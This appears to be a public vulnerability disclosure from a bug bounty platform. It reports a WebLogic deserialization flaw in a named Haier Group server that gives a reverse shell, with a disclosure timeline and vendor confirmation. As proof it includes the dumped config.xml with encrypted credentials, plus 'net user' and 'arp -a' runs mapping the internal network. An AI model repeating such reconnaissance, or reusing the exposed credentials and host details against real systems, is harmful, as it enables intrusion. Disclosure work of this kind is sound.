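2015-12-22: Details reported to the vendor; awaiting vendor handling
2015-12-24: Vendor confirmed; details disclosed to the vendor only
2016-01-03: Details disclosed to core white hats and experts in the relevant fields
2016-01-13: Details disclosed to regular white hats
2016-01-23: Details disclosed to intern white hats
2016-02-06: Details disclosed to the public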
Haier Group
http://27.223.70.77:7001/ has a WebLogic deserialization vulnerability that allows a reverse shell.
Reading the configuration:
D:\Oracle\Middleware\user_projects\domains\base_domain\config>type config.xml
type config.xml<?xml version='1.0' encoding='UTF-8'?><domain xmlns="http://xmlns.oracle.com/weblogic/domain" xmlns:sec="http://xmlns.oracle.com/weblogic/security" xmlns:wls="http://xmlns.oracle.com/weblogic/security/wls" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://xmlns.oracle.com/weblogic/security/xacml http://xmlns.oracle.com/weblogic/security/xacml/1.0/xacml.xsd http://xmlns.oracle.com/weblogic/security/providers/passwordvalidator http://xmlns.oracle.com/weblogic/security/providers/passwordvalidator/1.0/passwordvalidator.xsd http://xmlns.oracle.com/weblogic/domain http://xmlns.oracle.com/weblogic/1.0/domain.xsd http://xmlns.oracle.com/weblogic/security http://xmlns.oracle.com/weblogic/1.0/security.xsd http://xmlns.oracle.com/weblogic/security/wls http://xmlns.oracle.com/weblogic/security/wls/1.0/wls.xsd"> <name>base_domain</name> <domain-version>10.3.5.0</domain-version> <security-configuration> <name>base_domain</name> <realm> <sec:authentication-provider xsi:type="wls:default-authenticatorType"></sec:authentication-provider> <sec:authentication-provider xsi:type="wls:default-identity-asserterType"> <sec:active-type>AuthenticatedUser</sec:active-type> </sec:authentication-provider> <sec:role-mapper xmlns:xac="http://xmlns.oracle.com/weblogic/security/xacml" xsi:type="xac:xacml-role-mapperType"></sec:role-mapper> <sec:authorizer xmlns:xac="http://xmlns.oracle.com/weblogic/security/xacml" xsi:type="xac:xacml-authorizerType"></sec:authorizer> <sec:adjudicator xsi:type="wls:default-adjudicatorType"></sec:adjudicator> <sec:credential-mapper xsi:type="wls:default-credential-mapperType"></sec:credential-mapper> <sec:cert-path-provider xsi:type="wls:web-logic-cert-path-providerType"></sec:cert-path-provider> <sec:cert-path-builder>WebLogicCertPathProvider</sec:cert-path-builder> <sec:name>myrealm</sec:name> <sec:password-validator xmlns:pas="http://xmlns.oracle.com/weblogic/security/providers/passwordvalidator" 
xsi:type="pas:system-password-validatorType"> <sec:name>SystemPasswordValidator</sec:name> <pas:min-password-length>8</pas:min-password-length> <pas:min-numeric-or-special-characters>1</pas:min-numeric-or-special-characters> </sec:password-validator> </realm> <default-realm>myrealm</default-realm> <credential-encrypted>{AES}k77cNkchopQnD98Lk9bhatCSc8LYsOIPwQpBwD2IZ4GGFFkV2NWnNMNAG69CBoBpLK7gQa+WCOek6AfWNz6etTFe8A42os5QZQhevUwJVTqYBPcbP9JGDSjzq9+YOLOd</credential-encrypted> <node-manager-username>kXRx0qV8Ci</node-manager-username> <node-manager-password-encrypted>{AES}rBvG0C6Lqyj+i1tVEsjg1uRLlZA0FxVOBNPPT0mzHbI=</node-manager-password-encrypted> </security-configuration> <server> <name>AdminServer</name> <ssl> <server-private-key-alias>weblogic</server-private-key-alias> <server-private-key-pass-phrase-encrypted>{AES}gI07Nk70oXtmsbc9eRoE1GEiFoeioTtTZzTdfamsiy0=</server-private-key-pass-phrase-encrypted> </ssl> <listen-address></listen-address> <key-stores>DemoIdentityAndDemoTrust</key-stores> <custom-identity-key-store-file-name>D:\Oracle\MIDDLE~1\WLSERV~1.3\server\lib\DemoIdentity.jks</custom-identity-key-store-file-name> <custom-identity-key-store-type>jks</custom-identity-key-store-type> <custom-identity-key-store-pass-phrase-encrypted>{AES}WJ4ttnQJEBtkpWAkO+MUDJmreWP0GIxLLoP1htB22kI=</custom-identity-key-store-pass-phrase-encrypted> <custom-trust-key-store-file-name>D:\Oracle\Middleware\user_projects\domains\base_domain\jpushJks1.jks</custom-trust-key-store-file-name> <custom-trust-key-store-type>jks</custom-trust-key-store-type> <custom-trust-key-store-pass-phrase-encrypted>{AES}wd3BUY+mB9X7NC4wCcfmI6mFnkRgtbCq0vCYTL3heLA=</custom-trust-key-store-pass-phrase-encrypted> </server> <production-mode-enabled>true</production-mode-enabled> <embedded-ldap> <name>base_domain</name> <credential-encrypted>{AES}pbAo/PlhkYvUI6OQFrA89rodZK09WpCs+EeP04TAVbg0xr0eDQ8xqy0+RfmIwu/5</credential-encrypted> </embedded-ldap> <configuration-version>10.3.5.0</configuration-version> 
<app-deployment> <name>sales</name> <target>AdminServer</target> <module-type>war</module-type> <source-path>servers\AdminServer\upload\sales.war</source-path> <security-dd-model>DDOnly</security-dd-model> </app-deployment> <app-deployment> <name>dkt</name> <target>AdminServer</target> <module-type>war</module-type> <source-path>servers\AdminServer\upload\dkt.war</source-path> <security-dd-model>DDOnly</security-dd-model> </app-deployment> <admin-server-name>AdminServer</admin-server-name></domain>
net user
arp -a
接口: 10.135.108.217 --- 0xb
  Internet 地址         物理地址              类型
  10.135.108.1          00-26-52-b3-9a-45     动态
  10.135.108.10         d8-9d-67-26-54-44     动态
  10.135.108.11         d8-9d-67-2b-7b-34     动态
  10.135.108.90         00-50-56-a3-75-1f     动态
  10.135.108.94         00-50-56-a3-09-e8     动态
  10.135.108.111        00-50-56-a3-35-3c     动态
  10.135.108.146        00-50-56-a3-0e-8f     动态
  10.135.108.181        00-50-56-a3-79-8e     动态
  10.135.108.188        00-50-56-a3-47-94     动态
  10.135.108.197        00-50-56-a3-37-b3     动态
  10.135.108.221        00-50-56-a3-6e-ae     动态
  10.135.108.232        00-50-56-a3-45-3f     动态
  10.135.108.255        ff-ff-ff-ff-ff-ff     静态
  224.0.0.22            01-00-5e-00-00-16     静态
  224.0.0.252           01-00-5e-00-00-fc     静态
  239.255.255.250       01-00-5e-7f-ff-fa     静态
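Upgrade
Severity: High
Vulnerability Rank: 15
Confirmed at: 2015-12-24 09:07
Thanks to the white hat for the testing and the reminder; staff have been assigned to handle it.
None yet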